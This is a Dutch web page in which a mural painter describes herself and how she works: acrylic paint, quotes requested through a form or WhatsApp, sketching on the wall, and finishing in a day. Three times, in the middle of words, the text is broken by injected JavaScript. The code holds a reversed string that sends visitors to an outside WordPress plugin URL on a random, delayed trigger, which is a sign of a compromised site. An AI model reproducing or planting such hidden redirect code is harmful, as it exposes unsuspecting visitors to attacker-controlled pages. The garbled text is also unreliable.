Wie ben ik en werkwijze

Mijn naam is Natasja van den Bos en ben woonachtig in Leidschendam. Als kind was ik al creatief en veel met tekenen bezig. Inmiddels schilder ik al ruim 15 jaar op muren, maar ook op doek en mdf panelen. Ik werk met acrylverf, dit is op waterbasis, ruikt niet en is snel droog. Ideaal voor in slaapkamers.

Hoe ga ik te werk?

Het liefst ontvang ik via het contactformulier of via what’s app (06-23965440) een bericht met zo veel mogelijk informatie waar je een prijsopgave of informatie over wilt ontvangen.  Een voorbeeld wat je leuk vindt kan je meesturen of je kan alleen aangeven welk thema je leuk vindt en dan kan ik wat mogelijkheden doorgeven en voorbeelden terugsturen. Heb je een idee, maar weet je niet goed hoe dat het beste op de muur kan? Dan denk ik graag met je mee. 

Vooraf geef ik een toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totaalprijs door, zodat je niet voor verrassingen komt te staan. We plannen een datum dat ik kom, de meeste muurschilderingen zijn in een dag klaar. Zelf neem ik alle spullen mee, ook afdekkleden, in principe heb ik alleen water nodig. Eerst maak ik een schets op de muur, dit doe ik veelal uit de hand a.d.h.v. wat fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to’s. Dan begin ik met schilderen, de kleuren pas ik aan aan de rest van het kamertje, zodat alles mooi bij elkaar komt. Na afloop kan er afgerekend worden en staat er een prachtige, originele muurschildering op de wand.

Hieronder een filmpje gemaakt voor de ABN AMRO toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toen ik voor Roos Prommenschenkel in haar nieuwe huis een nieuwe muurschildering ging maken.